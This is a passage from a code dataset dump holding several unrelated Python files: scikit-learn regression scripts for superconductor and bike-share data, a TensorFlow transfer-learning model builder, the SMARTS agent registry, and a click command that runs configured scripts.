test_size=0.3,\n random_state=1)\n return X_train, X_test, y_train, y_test\n\n\ndf, col = read_atomic_data('unique_m.csv')\nX_train, X_test, y_train, y_test = get_dataset(df, col)\nfrom sklearn import preprocessing\nX_train = preprocessing.scale(X_train)\nX_test = preprocessing.scale(X_test)\nresults = {}\nR = Regression(X_train, X_test, y_train, y_test)\ndict = R.run()\nprint(dict)\ndraw.draw(dict, 'r2_score')\ndraw.draw(dict, 'max_error')\ndraw.draw(dict, 'explained_variance_score')\ndraw.draw(dict, 'mean_absolute_error')\ndraw.draw(dict, 'mean_squared_error')\ndraw.draw(dict, 'mean_squared_log_error')\ndraw.draw(dict, 'median_absolute_error')\nsys.exit()\n", "step-5": "import pandas as pd\nfrom sklearn.tree import DecisionTreeClassifier # Import Decision Tree Classifier\nfrom sklearn.model_selection import train_test_split # Import train_test_split function\nfrom sklearn import metrics #Import scikit-learn metrics module for accuracy calculation\nfrom sklearn.tree import DecisionTreeRegressor\nfrom sklearn.linear_model import BayesianRidge, LinearRegression\nimport os\nimport sys\nimport sklearn.metrics as mets\nfrom review import set_metrics as set_metrics\nfrom algo import Regression\nimport draw\n#https://datascience.stackexchange.com/questions/989/svm-using-scikit-learn-runs-endlessly-and-never-completes-execution\n#https://machinelearningmastery.com/time-series-prediction-lstm-recurrent-neural-networks-python-keras/\n#https://datascienceplus.com/keras-regression-based-neural-networks/\n\n#xgboost\n#random forest\n#lstm\n#rnn\n#dec tree\n#logistic regression\n#ann\n#naive bayes\n#monte carlo\n\ndef read_atomic_data(path):\n if not path or not os.path.exists(path) or not os.path.isfile(path):\n print(\"To begin with, your path to data should be proper!\")\n sys.exit(1)\n df = pd.read_csv(path)\n columns = df.columns.tolist() # get the columns\n columns = columns[:-1]\n df = pd.read_csv(path, usecols=columns)\n return df, columns\n\ndef get_dataset(df, columns):\n X = df[col[:-1]]\n y = df.critical_temp\n X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.3, random_state=1) \n return (X_train, X_test, y_train, y_test)\n\ndf, col = read_atomic_data(\"unique_m.csv\")\n(X_train, X_test, y_train, y_test) = get_dataset(df, col)\nfrom sklearn import preprocessing\nX_train = preprocessing.scale(X_train)\nX_test = preprocessing.scale(X_test)\nresults = {}\nR = Regression(X_train, X_test, y_train, y_test)\ndict = R.run()\nprint (dict)\ndraw.draw(dict, 'r2_score')\ndraw.draw(dict, 'max_error')\ndraw.draw(dict, 'explained_variance_score')\ndraw.draw(dict, 'mean_absolute_error')\ndraw.draw(dict, 'mean_squared_error')\ndraw.draw(dict, 'mean_squared_log_error')\ndraw.draw(dict, 'median_absolute_error')\n\nsys.exit()\n", "step-ids": [ 2, 3, 4, 5, 6 ] }
[ 2, 3, 4, 5, 6 ]
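One refinement worth noting for the record above: preprocessing.scale standardizes the train and test splits independently, so the test set is scaled with its own statistics rather than the training statistics. Fitting a StandardScaler on the training split alone keeps the transform consistent (a sketch, assuming X_train/X_test as in the record):

from sklearn.preprocessing import StandardScaler

scaler = StandardScaler().fit(X_train)   # learn mean/std from the training split only
X_train = scaler.transform(X_train)
X_test = scaler.transform(X_test)        # reuse the training statistics on the test split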
import tensorflow as tf
from typing import Optional, Tuple, Union, Callable

_data_augmentation = tf.keras.Sequential(
    [
        tf.keras.layers.experimental.preprocessing.RandomFlip("horizontal"),
        tf.keras.layers.experimental.preprocessing.RandomRotation(0.2),
    ]
)


def _freeze_model(
    model: tf.keras.Model,
    freeze: Union[bool, int, float] = False,
):
    # Obs:
    # When you set layer.trainable = False, the BatchNormalization layer will
    # run in inference mode, and will not update its mean and variance statistics
    # https://www.tensorflow.org/tutorials/images/transfer_learning#important_note_about_batchnormalization_layers

    # bool must be tested before int: bool is a subclass of int in Python,
    # so isinstance(True, int) is True and freeze=True would freeze one layer
    if isinstance(freeze, bool):
        freeze_len = len(model.layers) if freeze else 0
    elif isinstance(freeze, int):
        freeze_len = freeze
    elif isinstance(freeze, float):
        freeze_len = int(freeze * len(model.layers))

    if freeze_len != len(model.layers):
        model.trainable = True

    for layer in model.layers[:freeze_len]:
        layer.trainable = False


def generate_model(
    base_model: tf.keras.Model,
    img_shape: Tuple[Optional[int], Optional[int], Optional[int]],
    freeze: Union[bool, int, float] = False,
    preprocess_input: Optional[Callable] = None,
    use_data_augmentation: bool = True,
):
    inputs = tf.keras.layers.Input(shape=img_shape)
    # chain the optional stages instead of re-reading `inputs`, so that
    # augmentation is not silently discarded when preprocess_input is set
    x = inputs
    if use_data_augmentation:
        x = _data_augmentation(x)
    if preprocess_input is not None:
        x = preprocess_input(x)
    x = base_model(x, training=False)
    x = tf.keras.layers.GlobalAveragePooling2D()(x)
    x = tf.keras.layers.Dropout(0.2)(x)
    outputs = tf.keras.layers.Dense(1, activation="sigmoid")(x)

    model = tf.keras.Model(inputs, outputs)

    _freeze_model(base_model, freeze)

    base_learning_rate = 0.0001
    model.compile(
        optimizer=tf.keras.optimizers.Adam(learning_rate=base_learning_rate),
        loss=tf.keras.losses.BinaryCrossentropy(),
        metrics=["accuracy"],
    )

    return model
normal
{ "blob_id": "86d42716e05155f9e659b22c42635a8f5b8c4a60", "index": 753, "step-1": "<mask token>\n\n\ndef generate_model(base_model: tf.keras.Model, img_shape: Tuple[Optional[\n int], Optional[int], Optional[int]], freeze: Union[bool, int, float]=\n False, preprocess_input: Optional[Callable]=None, use_data_augmentation:\n bool=True):\n inputs = tf.keras.layers.Input(shape=img_shape)\n if use_data_augmentation:\n x = _data_augmentation(inputs)\n if preprocess_input is not None:\n x = preprocess_input(inputs)\n x = base_model(x, training=False)\n x = tf.keras.layers.GlobalAveragePooling2D()(x)\n x = tf.keras.layers.Dropout(0.2)(x)\n outputs = tf.keras.layers.Dense(1, activation='sigmoid')(x)\n model = tf.keras.Model(inputs, outputs)\n _freeze_model(base_model, freeze)\n base_learning_rate = 0.0001\n model.compile(optimizer=tf.keras.optimizers.Adam(learning_rate=\n base_learning_rate), loss=tf.keras.losses.BinaryCrossentropy(),\n metrics=['accuracy'])\n return model\n", "step-2": "<mask token>\n\n\ndef _freeze_model(model: tf.keras.Model, freeze: Union[bool, int, float]=False\n ):\n if isinstance(freeze, int):\n freeze_len = freeze\n elif isinstance(freeze, float):\n freeze_len = int(freeze * len(model.layers))\n elif freeze:\n freeze_len = len(model.layers)\n else:\n freeze_len = 0\n if freeze_len != len(model.layers):\n model.trainable = True\n for layer in model.layers[:freeze_len]:\n layer.trainable = False\n\n\ndef generate_model(base_model: tf.keras.Model, img_shape: Tuple[Optional[\n int], Optional[int], Optional[int]], freeze: Union[bool, int, float]=\n False, preprocess_input: Optional[Callable]=None, use_data_augmentation:\n bool=True):\n inputs = tf.keras.layers.Input(shape=img_shape)\n if use_data_augmentation:\n x = _data_augmentation(inputs)\n if preprocess_input is not None:\n x = preprocess_input(inputs)\n x = base_model(x, training=False)\n x = tf.keras.layers.GlobalAveragePooling2D()(x)\n x = tf.keras.layers.Dropout(0.2)(x)\n outputs = tf.keras.layers.Dense(1, activation='sigmoid')(x)\n model = tf.keras.Model(inputs, outputs)\n _freeze_model(base_model, freeze)\n base_learning_rate = 0.0001\n model.compile(optimizer=tf.keras.optimizers.Adam(learning_rate=\n base_learning_rate), loss=tf.keras.losses.BinaryCrossentropy(),\n metrics=['accuracy'])\n return model\n", "step-3": "<mask token>\n_data_augmentation = tf.keras.Sequential([tf.keras.layers.experimental.\n preprocessing.RandomFlip('horizontal'), tf.keras.layers.experimental.\n preprocessing.RandomRotation(0.2)])\n\n\ndef _freeze_model(model: tf.keras.Model, freeze: Union[bool, int, float]=False\n ):\n if isinstance(freeze, int):\n freeze_len = freeze\n elif isinstance(freeze, float):\n freeze_len = int(freeze * len(model.layers))\n elif freeze:\n freeze_len = len(model.layers)\n else:\n freeze_len = 0\n if freeze_len != len(model.layers):\n model.trainable = True\n for layer in model.layers[:freeze_len]:\n layer.trainable = False\n\n\ndef generate_model(base_model: tf.keras.Model, img_shape: Tuple[Optional[\n int], Optional[int], Optional[int]], freeze: Union[bool, int, float]=\n False, preprocess_input: Optional[Callable]=None, use_data_augmentation:\n bool=True):\n inputs = tf.keras.layers.Input(shape=img_shape)\n if use_data_augmentation:\n x = _data_augmentation(inputs)\n if preprocess_input is not None:\n x = preprocess_input(inputs)\n x = base_model(x, training=False)\n x = tf.keras.layers.GlobalAveragePooling2D()(x)\n x = tf.keras.layers.Dropout(0.2)(x)\n outputs = tf.keras.layers.Dense(1, activation='sigmoid')(x)\n 
model = tf.keras.Model(inputs, outputs)\n _freeze_model(base_model, freeze)\n base_learning_rate = 0.0001\n model.compile(optimizer=tf.keras.optimizers.Adam(learning_rate=\n base_learning_rate), loss=tf.keras.losses.BinaryCrossentropy(),\n metrics=['accuracy'])\n return model\n", "step-4": "import tensorflow as tf\nfrom typing import Optional, Tuple, Union, Callable\n_data_augmentation = tf.keras.Sequential([tf.keras.layers.experimental.\n preprocessing.RandomFlip('horizontal'), tf.keras.layers.experimental.\n preprocessing.RandomRotation(0.2)])\n\n\ndef _freeze_model(model: tf.keras.Model, freeze: Union[bool, int, float]=False\n ):\n if isinstance(freeze, int):\n freeze_len = freeze\n elif isinstance(freeze, float):\n freeze_len = int(freeze * len(model.layers))\n elif freeze:\n freeze_len = len(model.layers)\n else:\n freeze_len = 0\n if freeze_len != len(model.layers):\n model.trainable = True\n for layer in model.layers[:freeze_len]:\n layer.trainable = False\n\n\ndef generate_model(base_model: tf.keras.Model, img_shape: Tuple[Optional[\n int], Optional[int], Optional[int]], freeze: Union[bool, int, float]=\n False, preprocess_input: Optional[Callable]=None, use_data_augmentation:\n bool=True):\n inputs = tf.keras.layers.Input(shape=img_shape)\n if use_data_augmentation:\n x = _data_augmentation(inputs)\n if preprocess_input is not None:\n x = preprocess_input(inputs)\n x = base_model(x, training=False)\n x = tf.keras.layers.GlobalAveragePooling2D()(x)\n x = tf.keras.layers.Dropout(0.2)(x)\n outputs = tf.keras.layers.Dense(1, activation='sigmoid')(x)\n model = tf.keras.Model(inputs, outputs)\n _freeze_model(base_model, freeze)\n base_learning_rate = 0.0001\n model.compile(optimizer=tf.keras.optimizers.Adam(learning_rate=\n base_learning_rate), loss=tf.keras.losses.BinaryCrossentropy(),\n metrics=['accuracy'])\n return model\n", "step-5": "import tensorflow as tf\nfrom typing import Optional, Tuple, Union, Callable\n\n_data_augmentation = tf.keras.Sequential(\n [\n tf.keras.layers.experimental.preprocessing.RandomFlip(\"horizontal\"),\n tf.keras.layers.experimental.preprocessing.RandomRotation(0.2),\n ]\n)\n\n\ndef _freeze_model(\n model: tf.keras.Model,\n freeze: Union[bool, int, float] = False,\n):\n # Obs:\n # When you set layer.trainable = False, the BatchNormalization layer will\n # run in inference mode, and will not update its mean and variance statistics\n # https://www.tensorflow.org/tutorials/images/transfer_learning#important_note_about_batchnormalization_layers\n\n if isinstance(freeze, int):\n freeze_len = freeze\n elif isinstance(freeze, float):\n freeze_len = int(freeze * len(model.layers))\n else: # isinstance(freeze, bool):\n if freeze:\n freeze_len = len(model.layers)\n else:\n freeze_len = 0\n\n if freeze_len != len(model.layers):\n model.trainable = True\n\n for layer in model.layers[:freeze_len]:\n layer.trainable = False\n\n\ndef generate_model(\n base_model: tf.keras.Model,\n img_shape: Tuple[Optional[int], Optional[int], Optional[int]],\n freeze: Union[bool, int, float] = False,\n preprocess_input: Optional[Callable] = None,\n use_data_augmentation: bool = True,\n):\n inputs = tf.keras.layers.Input(shape=img_shape)\n if use_data_augmentation:\n x = _data_augmentation(inputs)\n if preprocess_input is not None:\n x = preprocess_input(inputs)\n x = base_model(x, training=False)\n x = tf.keras.layers.GlobalAveragePooling2D()(x)\n x = tf.keras.layers.Dropout(0.2)(x)\n outputs = tf.keras.layers.Dense(1, activation=\"sigmoid\")(x)\n\n model = tf.keras.Model(inputs, 
outputs)\n\n _freeze_model(base_model, freeze)\n\n base_learning_rate = 0.0001\n model.compile(\n optimizer=tf.keras.optimizers.Adam(learning_rate=base_learning_rate),\n loss=tf.keras.losses.BinaryCrossentropy(),\n metrics=[\"accuracy\"],\n )\n\n return model\n", "step-ids": [ 1, 2, 3, 4, 5 ] }
[ 1, 2, 3, 4, 5 ]
# Copyright (C) 2020. Huawei Technologies Co., Ltd. All rights reserved. # # Permission is hereby granted, free of charge, to any person obtaining a copy # of this software and associated documentation files (the "Software"), to deal # in the Software without restriction, including without limitation the rights # to use, copy, modify, merge, publish, distribute, sublicense, and/or sell # copies of the Software, and to permit persons to whom the Software is # furnished to do so, subject to the following conditions: # # The above copyright notice and this permission notice shall be included in # all copies or substantial portions of the Software. # # THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR # IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, # FITNESS FOR A PARTICULAR PURPOSE AND NON-INFRINGEMENT. IN NO EVENT SHALL THE # AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER # LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, # OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN # THE SOFTWARE. from smarts.core.utils.class_factory import ClassRegister agent_registry = ClassRegister() def register(locator: str, entry_point, **kwargs): """Register an AgentSpec with the zoo. In order to load a registered AgentSpec it needs to be reachable from a directory contained in the PYTHONPATH. Args: locator: A string in the format of 'locator-name' entry_point: A callable that returns an AgentSpec or an AgentSpec object For example: .. code-block:: python register( locator="motion-planner-agent-v0", entry_point=lambda **kwargs: AgentSpec( interface=AgentInterface(waypoint_paths=True, action=ActionSpaceType.TargetPose), agent_builder=MotionPlannerAgent, ), ) """ agent_registry.register(name=locator, entry_point=entry_point, **kwargs) def make(locator: str, **kwargs): """Create an AgentSpec from the given locator. In order to load a registered AgentSpec it needs to be reachable from a directory contained in the PYTHONPATH. Args: locator: A string in the format of 'path.to.file:locator-name' where the path is in the form `{PYTHONPATH}[n]/path/to/file.py` kwargs: Additional arguments to be passed to the constructed class. Returns: AgentSpec: The agent specifications needed to instantiate and configure an agent. """ from smarts.zoo.agent_spec import AgentSpec agent_spec = agent_registry.make(locator, **kwargs) assert isinstance( agent_spec, AgentSpec ), f"Expected make to produce an instance of AgentSpec, got: {agent_spec}" return agent_spec def make_agent(locator: str, **kwargs): """Create an Agent from the given agent spec locator. In order to load a registered AgentSpec it needs to be reachable from a directory contained in the PYTHONPATH. Args: locator: A string in the format of 'path.to.file:locator-name' where the path is in the form `{PYTHONPATH}[n]/path/to/file.py` kwargs: Additional arguments to be passed to the constructed class. Returns: Tuple[Agent, AgentInterface]: The agent and its interface. """ agent_spec = make(locator, **kwargs) return agent_spec.build_agent(), agent_spec.interface
normal
{ "blob_id": "b77c40c89c88b49c851e9a14c67cf0799d6de847", "index": 9235, "step-1": "<mask token>\n\n\ndef register(locator: str, entry_point, **kwargs):\n \"\"\"Register an AgentSpec with the zoo.\n\n In order to load a registered AgentSpec it needs to be reachable from a\n directory contained in the PYTHONPATH.\n\n Args:\n locator:\n A string in the format of 'locator-name'\n entry_point:\n A callable that returns an AgentSpec or an AgentSpec object\n\n For example:\n\n .. code-block:: python\n\n register(\n locator=\"motion-planner-agent-v0\",\n entry_point=lambda **kwargs: AgentSpec(\n interface=AgentInterface(waypoint_paths=True, action=ActionSpaceType.TargetPose),\n agent_builder=MotionPlannerAgent,\n ),\n )\n \"\"\"\n agent_registry.register(name=locator, entry_point=entry_point, **kwargs)\n\n\ndef make(locator: str, **kwargs):\n \"\"\"Create an AgentSpec from the given locator.\n\n In order to load a registered AgentSpec it needs to be reachable from a\n directory contained in the PYTHONPATH.\n\n Args:\n locator:\n A string in the format of 'path.to.file:locator-name' where the path\n is in the form `{PYTHONPATH}[n]/path/to/file.py`\n kwargs:\n Additional arguments to be passed to the constructed class.\n Returns:\n AgentSpec: The agent specifications needed to instantiate and configure an agent.\n \"\"\"\n from smarts.zoo.agent_spec import AgentSpec\n agent_spec = agent_registry.make(locator, **kwargs)\n assert isinstance(agent_spec, AgentSpec\n ), f'Expected make to produce an instance of AgentSpec, got: {agent_spec}'\n return agent_spec\n\n\n<mask token>\n", "step-2": "<mask token>\n\n\ndef register(locator: str, entry_point, **kwargs):\n \"\"\"Register an AgentSpec with the zoo.\n\n In order to load a registered AgentSpec it needs to be reachable from a\n directory contained in the PYTHONPATH.\n\n Args:\n locator:\n A string in the format of 'locator-name'\n entry_point:\n A callable that returns an AgentSpec or an AgentSpec object\n\n For example:\n\n .. 
code-block:: python\n\n register(\n locator=\"motion-planner-agent-v0\",\n entry_point=lambda **kwargs: AgentSpec(\n interface=AgentInterface(waypoint_paths=True, action=ActionSpaceType.TargetPose),\n agent_builder=MotionPlannerAgent,\n ),\n )\n \"\"\"\n agent_registry.register(name=locator, entry_point=entry_point, **kwargs)\n\n\ndef make(locator: str, **kwargs):\n \"\"\"Create an AgentSpec from the given locator.\n\n In order to load a registered AgentSpec it needs to be reachable from a\n directory contained in the PYTHONPATH.\n\n Args:\n locator:\n A string in the format of 'path.to.file:locator-name' where the path\n is in the form `{PYTHONPATH}[n]/path/to/file.py`\n kwargs:\n Additional arguments to be passed to the constructed class.\n Returns:\n AgentSpec: The agent specifications needed to instantiate and configure an agent.\n \"\"\"\n from smarts.zoo.agent_spec import AgentSpec\n agent_spec = agent_registry.make(locator, **kwargs)\n assert isinstance(agent_spec, AgentSpec\n ), f'Expected make to produce an instance of AgentSpec, got: {agent_spec}'\n return agent_spec\n\n\ndef make_agent(locator: str, **kwargs):\n \"\"\"Create an Agent from the given agent spec locator.\n\n In order to load a registered AgentSpec it needs to be reachable from a\n directory contained in the PYTHONPATH.\n\n Args:\n locator:\n A string in the format of 'path.to.file:locator-name' where the path\n is in the form `{PYTHONPATH}[n]/path/to/file.py`\n kwargs:\n Additional arguments to be passed to the constructed class.\n Returns:\n Tuple[Agent, AgentInterface]: The agent and its interface.\n \"\"\"\n agent_spec = make(locator, **kwargs)\n return agent_spec.build_agent(), agent_spec.interface\n", "step-3": "<mask token>\nagent_registry = ClassRegister()\n\n\ndef register(locator: str, entry_point, **kwargs):\n \"\"\"Register an AgentSpec with the zoo.\n\n In order to load a registered AgentSpec it needs to be reachable from a\n directory contained in the PYTHONPATH.\n\n Args:\n locator:\n A string in the format of 'locator-name'\n entry_point:\n A callable that returns an AgentSpec or an AgentSpec object\n\n For example:\n\n .. 
code-block:: python\n\n register(\n locator=\"motion-planner-agent-v0\",\n entry_point=lambda **kwargs: AgentSpec(\n interface=AgentInterface(waypoint_paths=True, action=ActionSpaceType.TargetPose),\n agent_builder=MotionPlannerAgent,\n ),\n )\n \"\"\"\n agent_registry.register(name=locator, entry_point=entry_point, **kwargs)\n\n\ndef make(locator: str, **kwargs):\n \"\"\"Create an AgentSpec from the given locator.\n\n In order to load a registered AgentSpec it needs to be reachable from a\n directory contained in the PYTHONPATH.\n\n Args:\n locator:\n A string in the format of 'path.to.file:locator-name' where the path\n is in the form `{PYTHONPATH}[n]/path/to/file.py`\n kwargs:\n Additional arguments to be passed to the constructed class.\n Returns:\n AgentSpec: The agent specifications needed to instantiate and configure an agent.\n \"\"\"\n from smarts.zoo.agent_spec import AgentSpec\n agent_spec = agent_registry.make(locator, **kwargs)\n assert isinstance(agent_spec, AgentSpec\n ), f'Expected make to produce an instance of AgentSpec, got: {agent_spec}'\n return agent_spec\n\n\ndef make_agent(locator: str, **kwargs):\n \"\"\"Create an Agent from the given agent spec locator.\n\n In order to load a registered AgentSpec it needs to be reachable from a\n directory contained in the PYTHONPATH.\n\n Args:\n locator:\n A string in the format of 'path.to.file:locator-name' where the path\n is in the form `{PYTHONPATH}[n]/path/to/file.py`\n kwargs:\n Additional arguments to be passed to the constructed class.\n Returns:\n Tuple[Agent, AgentInterface]: The agent and its interface.\n \"\"\"\n agent_spec = make(locator, **kwargs)\n return agent_spec.build_agent(), agent_spec.interface\n", "step-4": "from smarts.core.utils.class_factory import ClassRegister\nagent_registry = ClassRegister()\n\n\ndef register(locator: str, entry_point, **kwargs):\n \"\"\"Register an AgentSpec with the zoo.\n\n In order to load a registered AgentSpec it needs to be reachable from a\n directory contained in the PYTHONPATH.\n\n Args:\n locator:\n A string in the format of 'locator-name'\n entry_point:\n A callable that returns an AgentSpec or an AgentSpec object\n\n For example:\n\n .. 
code-block:: python\n\n register(\n locator=\"motion-planner-agent-v0\",\n entry_point=lambda **kwargs: AgentSpec(\n interface=AgentInterface(waypoint_paths=True, action=ActionSpaceType.TargetPose),\n agent_builder=MotionPlannerAgent,\n ),\n )\n \"\"\"\n agent_registry.register(name=locator, entry_point=entry_point, **kwargs)\n\n\ndef make(locator: str, **kwargs):\n \"\"\"Create an AgentSpec from the given locator.\n\n In order to load a registered AgentSpec it needs to be reachable from a\n directory contained in the PYTHONPATH.\n\n Args:\n locator:\n A string in the format of 'path.to.file:locator-name' where the path\n is in the form `{PYTHONPATH}[n]/path/to/file.py`\n kwargs:\n Additional arguments to be passed to the constructed class.\n Returns:\n AgentSpec: The agent specifications needed to instantiate and configure an agent.\n \"\"\"\n from smarts.zoo.agent_spec import AgentSpec\n agent_spec = agent_registry.make(locator, **kwargs)\n assert isinstance(agent_spec, AgentSpec\n ), f'Expected make to produce an instance of AgentSpec, got: {agent_spec}'\n return agent_spec\n\n\ndef make_agent(locator: str, **kwargs):\n \"\"\"Create an Agent from the given agent spec locator.\n\n In order to load a registered AgentSpec it needs to be reachable from a\n directory contained in the PYTHONPATH.\n\n Args:\n locator:\n A string in the format of 'path.to.file:locator-name' where the path\n is in the form `{PYTHONPATH}[n]/path/to/file.py`\n kwargs:\n Additional arguments to be passed to the constructed class.\n Returns:\n Tuple[Agent, AgentInterface]: The agent and its interface.\n \"\"\"\n agent_spec = make(locator, **kwargs)\n return agent_spec.build_agent(), agent_spec.interface\n", "step-5": "# Copyright (C) 2020. Huawei Technologies Co., Ltd. All rights reserved.\n#\n# Permission is hereby granted, free of charge, to any person obtaining a copy\n# of this software and associated documentation files (the \"Software\"), to deal\n# in the Software without restriction, including without limitation the rights\n# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell\n# copies of the Software, and to permit persons to whom the Software is\n# furnished to do so, subject to the following conditions:\n#\n# The above copyright notice and this permission notice shall be included in\n# all copies or substantial portions of the Software.\n#\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n# FITNESS FOR A PARTICULAR PURPOSE AND NON-INFRINGEMENT. IN NO EVENT SHALL THE\n# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN\n# THE SOFTWARE.\nfrom smarts.core.utils.class_factory import ClassRegister\n\nagent_registry = ClassRegister()\n\n\ndef register(locator: str, entry_point, **kwargs):\n \"\"\"Register an AgentSpec with the zoo.\n\n In order to load a registered AgentSpec it needs to be reachable from a\n directory contained in the PYTHONPATH.\n\n Args:\n locator:\n A string in the format of 'locator-name'\n entry_point:\n A callable that returns an AgentSpec or an AgentSpec object\n\n For example:\n\n .. 
code-block:: python\n\n register(\n locator=\"motion-planner-agent-v0\",\n entry_point=lambda **kwargs: AgentSpec(\n interface=AgentInterface(waypoint_paths=True, action=ActionSpaceType.TargetPose),\n agent_builder=MotionPlannerAgent,\n ),\n )\n \"\"\"\n\n agent_registry.register(name=locator, entry_point=entry_point, **kwargs)\n\n\ndef make(locator: str, **kwargs):\n \"\"\"Create an AgentSpec from the given locator.\n\n In order to load a registered AgentSpec it needs to be reachable from a\n directory contained in the PYTHONPATH.\n\n Args:\n locator:\n A string in the format of 'path.to.file:locator-name' where the path\n is in the form `{PYTHONPATH}[n]/path/to/file.py`\n kwargs:\n Additional arguments to be passed to the constructed class.\n Returns:\n AgentSpec: The agent specifications needed to instantiate and configure an agent.\n \"\"\"\n\n from smarts.zoo.agent_spec import AgentSpec\n\n agent_spec = agent_registry.make(locator, **kwargs)\n assert isinstance(\n agent_spec, AgentSpec\n ), f\"Expected make to produce an instance of AgentSpec, got: {agent_spec}\"\n\n return agent_spec\n\n\ndef make_agent(locator: str, **kwargs):\n \"\"\"Create an Agent from the given agent spec locator.\n\n In order to load a registered AgentSpec it needs to be reachable from a\n directory contained in the PYTHONPATH.\n\n Args:\n locator:\n A string in the format of 'path.to.file:locator-name' where the path\n is in the form `{PYTHONPATH}[n]/path/to/file.py`\n kwargs:\n Additional arguments to be passed to the constructed class.\n Returns:\n Tuple[Agent, AgentInterface]: The agent and its interface.\n \"\"\"\n\n agent_spec = make(locator, **kwargs)\n\n return agent_spec.build_agent(), agent_spec.interface\n", "step-ids": [ 2, 3, 4, 5, 6 ] }
[ 2, 3, 4, 5, 6 ]
"""Command 'run' module.""" import click from loguru import logger from megalus.main import Megalus @click.command() @click.argument("command", nargs=1, required=True) @click.pass_obj def run(meg: Megalus, command: str) -> None: """Run selected script. :param meg: Megalus instance :param command: command/script to execute :return: None """ line_to_run = meg.config_data["defaults"].get("scripts", {}).get(command, None) if not line_to_run: logger.warning('Command "{}" not found in configuration file.'.format(command)) else: meg.run_command(line_to_run)
normal
{ "blob_id": "23a4ca8eec50e6ab72be3f1b1077c61f676b3cce", "index": 5777, "step-1": "<mask token>\n", "step-2": "<mask token>\n\n\[email protected]()\[email protected]('command', nargs=1, required=True)\[email protected]_obj\ndef run(meg: Megalus, command: str) ->None:\n \"\"\"Run selected script.\n\n :param meg: Megalus instance\n :param command: command/script to execute\n :return: None\n \"\"\"\n line_to_run = meg.config_data['defaults'].get('scripts', {}).get(command,\n None)\n if not line_to_run:\n logger.warning('Command \"{}\" not found in configuration file.'.\n format(command))\n else:\n meg.run_command(line_to_run)\n", "step-3": "<mask token>\nimport click\nfrom loguru import logger\nfrom megalus.main import Megalus\n\n\[email protected]()\[email protected]('command', nargs=1, required=True)\[email protected]_obj\ndef run(meg: Megalus, command: str) ->None:\n \"\"\"Run selected script.\n\n :param meg: Megalus instance\n :param command: command/script to execute\n :return: None\n \"\"\"\n line_to_run = meg.config_data['defaults'].get('scripts', {}).get(command,\n None)\n if not line_to_run:\n logger.warning('Command \"{}\" not found in configuration file.'.\n format(command))\n else:\n meg.run_command(line_to_run)\n", "step-4": "\"\"\"Command 'run' module.\"\"\"\n\nimport click\nfrom loguru import logger\n\nfrom megalus.main import Megalus\n\n\[email protected]()\[email protected](\"command\", nargs=1, required=True)\[email protected]_obj\ndef run(meg: Megalus, command: str) -> None:\n \"\"\"Run selected script.\n\n :param meg: Megalus instance\n :param command: command/script to execute\n :return: None\n \"\"\"\n line_to_run = meg.config_data[\"defaults\"].get(\"scripts\", {}).get(command, None)\n if not line_to_run:\n logger.warning('Command \"{}\" not found in configuration file.'.format(command))\n else:\n meg.run_command(line_to_run)\n", "step-5": null, "step-ids": [ 0, 1, 2, 3 ] }
[ 0, 1, 2, 3 ]
#!/usr/bin/env python3

import pandas
from matplotlib import pyplot as plt
from sklearn.tree import DecisionTreeRegressor
from sklearn.ensemble import AdaBoostRegressor
import numpy as np
from sklearn.metrics import mean_absolute_error, mean_squared_error
from math import sqrt

def main():
    # DataFrame.append was removed in pandas 2.0; concatenate the quarterly
    # files instead.
    df = pandas.concat([pandas.read_csv(q) for q in ("2016Q1", "2016Q2", "2016Q3", "2016Q4")])
    test = pandas.concat([pandas.read_csv(q) for q in ("2017Q1", "2017Q2", "2017Q3", "2017Q4")])
    #make_scatter(df)
    train_predict_1d(df, test)
    #train_predict_2d(df, test)
    return

def make_scatter(df):
    plt.figure(figsize=(8,6))
    plt.plot(df['Start station number'], df['Counts'], 'o')
    plt.xlabel('Station')
    plt.ylabel('Counts')
    plt.show()
    return

def train_predict_1d(df, test):
    regressor = DecisionTreeRegressor(max_depth=2)
    regressor.fit(np.array([df['Start station number']]).T, df['Counts'])

    xx = np.array([test['Start station number']]).T
    plt.figure(figsize=(8,6))
    plt.plot(df['Start station number'], df['Counts'], 'o', label='observation')
    plt.plot(xx, regressor.predict(xx), linewidth=4, alpha=.7, label='prediction')
    plt.xlabel('Station')
    plt.ylabel('Counts')
    plt.legend()
    #plt.show()

    print("RMSE")
    print(sqrt(mean_squared_error(test['Counts'], regressor.predict(xx))))
    return

def train_predict_2d(df, test):
    #regressor = AdaBoostRegressor(DecisionTreeRegressor(max_depth=10), n_estimators=50, loss="square")
    regressor = DecisionTreeRegressor()
    regressor.fit(df[['Start station number', 'Quarter']], df['Counts'])

    # Evaluate the model on a regular grid of (station, quarter) points.
    nx = 30
    ny = 30

    x_station = np.linspace(30800, 32300, nx)
    y_day = np.linspace(0, 3, ny)
    xx, yy = np.meshgrid(x_station, y_day)

    z_counts = regressor.predict(np.array([xx.flatten(), yy.flatten()]).T)
    zz = np.reshape(z_counts, (nx, ny))

    fig = plt.figure(figsize=(8, 8))
    plt.pcolormesh(x_station, y_day, zz, cmap=plt.cm.YlOrRd)
    plt.colorbar(label='bikes predicted')
    #plt.scatter(test['Start station number'], test['Counts'], s=test['Counts']/25.0, c='g')
    plt.xlim(np.min(x_station), np.max(x_station))
    plt.ylim(np.min(y_day), np.max(y_day))
    plt.xlabel('Start station number')
    plt.ylabel('Quarter')
    #plt.show()
    #fig.savefig("2d_prediction_quarter")

    print("Mean Absolute Error")
    print(mean_absolute_error(test['Counts'], regressor.predict(test[['Start station number', 'Quarter']])))
    print("RMSE")
